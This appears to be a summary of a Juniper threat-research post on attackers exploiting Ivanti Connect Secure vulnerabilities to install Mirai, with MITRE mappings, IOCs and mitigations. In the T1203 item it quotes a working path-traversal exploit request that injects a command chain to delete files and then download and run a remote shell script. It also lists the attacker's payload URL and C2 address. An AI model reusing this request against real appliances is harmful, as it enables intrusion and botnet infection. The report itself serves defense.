Threat Research

Protecting Networks from Opportunistic Ivanti Pulse Secure Vulnerability Exploitation | Official Juniper Networks Blogs

Securonix

Juniper Threat Labs reports opportunistic exploitation of Ivanti Pulse Secure authentication bypass and remote code execution vulnerabilities, leading to Mirai botnet payload delivery in the wild. The post analyzes the flaws, exploitation methods, observed payloads, and Juniper’s recommended mitigations, including patches, Juniper ATP Cloud protection, and IDP signatures. #IvantiPulseSecure #Mirai #CVE-2023-46805 #CVE-2024-21887 #IvantiConnectSecure #IvantiPolicySecure #JuniperThreatLabs

Keypoints

  • Exploitation attempts target Ivanti Pulse Secure vulnerabilities CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection).
  • CVE-2023-46805 affects Ivanti Connect Secure and Ivanti Policy Secure Gateways, enabling unauthorized access via the /api/v1/totp/user-backup-code endpoint with path traversal.
  • CVE-2024-21887 is a web component command injection that can be exploited over the internet to run arbitrary commands on the appliance.
  • Attackers combine auth bypass and path traversal to access sensitive resources and deploy payloads such as Mirai.
  • Mirai botnet payloads have been observed, including delivery via shell scripts and reverse shells (curl/Python-based).
  • Mitigations include applying Ivanti patches, Juniper ATP Cloud protection against Mirai and other malware, and IDP signatures at the network level.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – Exploitation of Ivanti Pulse Secure vulnerabilities enables remote access to restricted resources via vulnerable endpoints. ‘A security flaw, affecting both Ivanti ICS (Ivanti Connect Secure) and Ivanti Policy Secure, enables a remote attacker to gain unauthorized access to restricted resources by circumventing control checks.’
  • [T1059] Command and Scripting Interpreter – Attackers use crafted requests and shell commands (curl and Python-based reverse shells) to deploy payloads, including Mirai. ‘observed instances in the wild where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems.’
  • [T1105] Ingress Tool Transfer – Attackers download a script from a remote server and execute it to deploy Mirai payloads. ‘downloads a file named “lol” from a specific URL (http://192[.]3[.]152[.]183/mips). After downloading, it gives the downloaded file permission to execute and runs it with the argument “0day_machine”.’
  • [T1203] Exploitation for Client Execution – The vulnerabilities enable remote code execution on the appliance, allowing attackers to run payloads like Mirai. ‘The encoded URL decodes to (This will come in a code block in WordPress) GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /; wget http:/…/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1’

Indicators of Compromise

  • [IP] context – 192.3.152.183, 192.3.152.183 (C2/C2-like infrastructure)
  • [Hash] context – F20da76d75c7966abcbc050dde259a2c85b331c80cce0d113bc976734b78d61d, d6f5fc248e4c8fc7a86a8193eb970fe9503f2766951a3e4b8c084684e423e917
  • [URL] context – http://192.3.152.183/mips
  • [File name] context – lol, wtf.sh

Read more: https://blogs.juniper.net/en-us/security/protecting-your-network-from-opportunistic-ivanti-pulse-secure-vulnerability-exploitation